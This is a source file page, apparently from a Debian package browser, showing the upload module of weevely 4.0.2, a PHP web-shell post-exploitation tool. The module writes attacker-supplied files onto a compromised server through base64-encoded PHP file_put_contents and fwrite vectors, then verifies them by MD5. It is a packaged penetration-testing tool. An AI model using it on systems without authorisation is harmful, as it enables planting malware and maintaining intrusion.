File: upload.py

package info (click to toggle)
weevely 4.0.2-1
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid, trixie
  • size: 1,336 kB
  • sloc: python: 7,732; php: 1,035; sh: 53; makefile: 2
file content (92 lines) | stat: -rw-r--r-- 2,986 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
 
from core.vectors import PhpCode, ModuleExec
from core.module import Module
from core import messages
from core.loggers import log
import random
import hashlib
import base64


class Upload(Module):

    """Upload file to remote filesystem."""

    def init(self):

        self.register_info(
            {
                'author': [
                    'Emilio Pinna'
                ],
                'license': 'GPLv3'
            }
        )

        self.register_vectors(
            [
            PhpCode(
              "(file_put_contents('${rpath}',base64_decode('${content}'))&&print(1))||print(0);",
              name = 'file_put_contents'
              ),

            PhpCode(
              """($h=fopen("${rpath}","a+")&&fwrite($h,base64_decode('${content}'))&&fclose($h)&&print(1))||print(0);""",
              name = "fwrite"
              )
            ]
        )

        self.register_arguments([
          { 'name' : 'lpath', 'help' : 'Local file path', 'nargs' : '?' },
          { 'name' : 'rpath', 'help' : 'Remote file path' },
          { 'name' : '-force', 'help' : 'Force overwrite', 'action' : 'store_true', 'default' : False },
          { 'name' : '-content', 'help' : 'Optionally specify the file content'},
          { 'name' : '-vector', 'choices' : self.vectors.get_names(), 'default' : 'file_put_contents' }
        ])

    def run(self, **kwargs):

        content_orig = self.args.get('content')

        if content_orig == None:

            # Load local file
            lpath = self.args.get('lpath')
            if not lpath:
                log.warning(messages.module_file_upload.error_content_lpath_required)
                return

            try:
                with open(lpath, 'rb') as contentfile:
                    content_orig = contentfile.read()
            except Exception as e:
                log.warning(
                  messages.generic.error_loading_file_s_s % (lpath, str(e)))
                return
        else:
            content_orig = content_orig.encode('utf-8')

        self.args['content'] = base64.b64encode(content_orig).decode('utf-8')

        # Check remote file existence
        if not self.args['force'] and ModuleExec('file_check', [ self.args['rpath'], 'exists' ]).run():
            log.warning(messages.generic.error_file_s_already_exists % self.args['rpath'])
            return

        vector_name, result = self.vectors.find_first_result(
         format_args = self.args,
         condition = lambda result: True if result == '1' else False
        )

        if not ModuleExec('file_check', [ self.args['rpath'], 'exists' ]).run():
            log.warning(messages.module_file_upload.failed_upload_file)
            return

        if not (
          ModuleExec('file_check', [ self.args['rpath'], 'md5' ]).run() ==
          hashlib.md5(content_orig).hexdigest()
          ):
            log.warning(messages.module_file_upload.failed_md5_check)
            return

        return True